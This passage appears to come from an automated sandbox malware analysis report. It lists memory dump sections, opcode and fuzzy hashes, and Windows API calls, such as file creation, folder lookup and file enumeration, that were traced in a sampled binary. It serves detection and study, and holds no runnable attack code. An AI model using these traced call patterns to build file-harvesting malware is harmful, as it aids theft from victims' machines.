                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                  • String ID:
                  • API String ID: 3729781310-0
                  • Opcode ID: a27d52a7d7122ba96822e69f7c3be9c23a46cd3029bfcd09e6f74f5ee4a92bc7
                  • Instruction ID: d26e770e45544a0e22e812f5b9e0b034061aeda74352929f9dd5df38adc15a42
                  • Opcode Fuzzy Hash: a27d52a7d7122ba96822e69f7c3be9c23a46cd3029bfcd09e6f74f5ee4a92bc7
                  • Instruction Fuzzy Hash: 35312D71E0024C9FDB14DFE0CD59BEEB778FB44301F204559E50AAB184DB74AA89DB62
                  APIs
                  • CreateFileA.KERNEL32(00D43AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00D43AEE,?), ref: 00D492FC
                  • GetFileSizeEx.KERNEL32(000000FF,00D43AEE), ref: 00D49319
                  • CloseHandle.KERNEL32(000000FF), ref: 00D49327
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: d1bc7c5384f2df8913f396e0c6db724032b3caca6a4fc0bedf2627a0b77274ca
                  • Instruction ID: ae9a10ebb245fde290d2ef09c79049fe71e8557ca2d78d5ae76a12bad3d8acf8
                  • Opcode Fuzzy Hash: d1bc7c5384f2df8913f396e0c6db724032b3caca6a4fc0bedf2627a0b77274ca
                  • Instruction Fuzzy Hash: C3F0A934E00208BBDB14DFB1DC19F9EB7B9AB88320F11C254BA55A72C0D670AA419B51
                  APIs
                  • __getptd.LIBCMT ref: 00D4C74E
                    • Part of subcall function 00D4BF9F: __amsg_exit.LIBCMT ref: 00D4BFAF
                  • __getptd.LIBCMT ref: 00D4C765
                  • __amsg_exit.LIBCMT ref: 00D4C773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00D4C797
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 35a1ff5c8c591069060a818e2164055f79535bb6c5585f41e61c65dabcb8a52b
                  • Instruction ID: 29935a6414632201ced1ed2a2306b2e1e77edaa955fd15cc666faa069bb0ad2e
                  • Opcode Fuzzy Hash: 35a1ff5c8c591069060a818e2164055f79535bb6c5585f41e61c65dabcb8a52b
                  • Instruction Fuzzy Hash: 51F0B4329527109BDB70BBBC5807B5D33A0EF10732F24514AF844A62D2DB6499449E76
                  APIs
                    • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00D44F7A
                  • lstrcat.KERNEL32(?,00D51070), ref: 00D44F97
                  • lstrcat.KERNEL32(?,00AF9108), ref: 00D44FAB
                  • lstrcat.KERNEL32(?,00D51074), ref: 00D44FBD
                    • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D4492C
                    • Part of subcall function 00D44910: FindFirstFileA.KERNEL32(?,?), ref: 00D44943
                    • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FDC), ref: 00D44971
                    • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FE0), ref: 00D44987
                    • Part of subcall function 00D44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00D44B7D
                    • Part of subcall function 00D44910: FindClose.KERNEL32(000000FF), ref: 00D44B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: bfdeca920183c7508590d2e13523a352ce13fd56b4b7783b0235e610f31b1fd6
                  • Instruction ID: 7abd70461d1d544a86826db372bc2bc92e33cb0c372b89da0884d4f52500f952
                  • Opcode Fuzzy Hash: bfdeca920183c7508590d2e13523a352ce13fd56b4b7783b0235e610f31b1fd6
                  • Instruction Fuzzy Hash: 0421867A9402086BCB54FBB0DC46EED333CEB98301F004558BA5992181EE749ACC9BB3